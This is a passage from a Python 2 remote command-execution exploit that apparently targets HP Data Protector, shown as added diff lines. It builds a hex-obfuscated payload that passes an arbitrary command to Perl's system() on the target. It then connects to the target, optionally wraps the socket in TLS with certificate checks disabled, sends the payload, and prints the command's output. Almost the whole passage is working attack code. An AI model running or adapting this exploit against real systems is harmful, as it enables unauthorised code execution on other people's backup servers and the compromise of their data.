"\x65\x72\x6c\x2e\x65\x78\x65\x00" +\ + "\x20\x2d\x65\x73\x79\x73\x74\x65" +\ + "\x6d('%s')\x00" % command + +def get_data(sock): + response = '' + recv_len =1 + + while recv_len: + data = sock.recv(4096) + recv_len = len(data) + response += data + if recv_len < 4096: + break + + return response + +def get_dp_response(sock): + + print "===== Response =====" + print + + while True: + + # Get information about response + packed_length = sock.recv(4) + if not packed_length: + break + n = struct.unpack(">I", packed_length)[0] + tmpresponse = sock.recv(n) + tmpresponse = tmpresponse.replace("\n", "") + tmpresponse = tmpresponse.replace("\x00", "") + tmpresponse = tmpresponse.replace("\xff\xfe\x39\x20", "") + if tmpresponse.upper().find("*RETVAL*") != -1: + break + else: + print tmpresponse + + print + print "===== End =====" + print + + +client = socket.socket( socket.AF_INET, socket.SOCK_STREAM ) + +if args.encrypt: + context = ssl.create_default_context() + context.check_hostname = False + context.verify_mode = ssl.CERT_NONE + context.set_ciphers('ALL') + +try: + client.connect(( HOST, PORT )) + print "Connected" + + if args.encrypt: + # send data protector init string + client.send(initdata) + response = get_data(client) + + # setup tls + client = context.wrap_socket(client) + print "Encryption Enabled" + + # send payload + client.send(payload) + print "Sent Payload" + print "" + print "===== Command =====" + print + print command + print + get_dp_response(client) + + client.close() + +except Exception as e: + print '[*] Exception. Exiting.' + print e + client.close() + +